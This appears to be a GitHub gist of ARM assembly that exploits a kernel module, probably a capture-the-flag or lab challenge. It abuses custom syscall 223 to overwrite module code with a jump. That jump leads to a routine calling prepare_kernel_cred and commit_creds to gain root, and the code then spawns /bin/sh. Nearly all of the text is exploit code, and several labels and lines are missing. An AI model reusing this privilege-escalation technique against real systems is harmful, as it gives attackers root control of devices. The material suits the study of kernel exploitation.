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Last active July 31, 2018 13:02
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  • Save HopHouse/04182707d82b569f963958f58f70dbfb to your computer and use it in GitHub Desktop.
Save HopHouse/04182707d82b569f963958f58f70dbfb to your computer and use it in GitHub Desktop.
.asciz "//bin/sh"
.word 0x00000000
.global _start
syscall(223, a, o, b, &r);
* Write jump to
ldr r0, =0xea000000
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001bc /* location of + branch operand in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
ldr r0, =0x00000000
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c0 /* location of + branch operand plus 4 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
ldr r0, =0xe51ff004
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c4 /* location of + branch operand plus 8 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
* Adress of the jump
ldr r0, =elevate
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c8 /* location of + branch operand plus 12 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
* Read our elevate function and jump to it
ldr r0, =8
ldr r1, =43 /* operand + */
ldr r2, =8
ldr r3, addr_of_result
mov r7, #223 /* syscall 223 -> calc */
svc #0
* We have the root uid, so let's open a shell
b shell
mov r7, #1
svc #0
* Get root uid
mov r0, #0
bl 0x80042464 /* prepare_kernel_cred */
bl 0x80042148 /* commit_creds */
bx lr
* Open a shell
ldr r0, =sh
sub r2, r2, r2
push {r2}
push {r0}
mov r1, sp /* r0 */
mov r7, #0xb
svc #0
addr_of_sh: .word sh
addr_of_result: .word result
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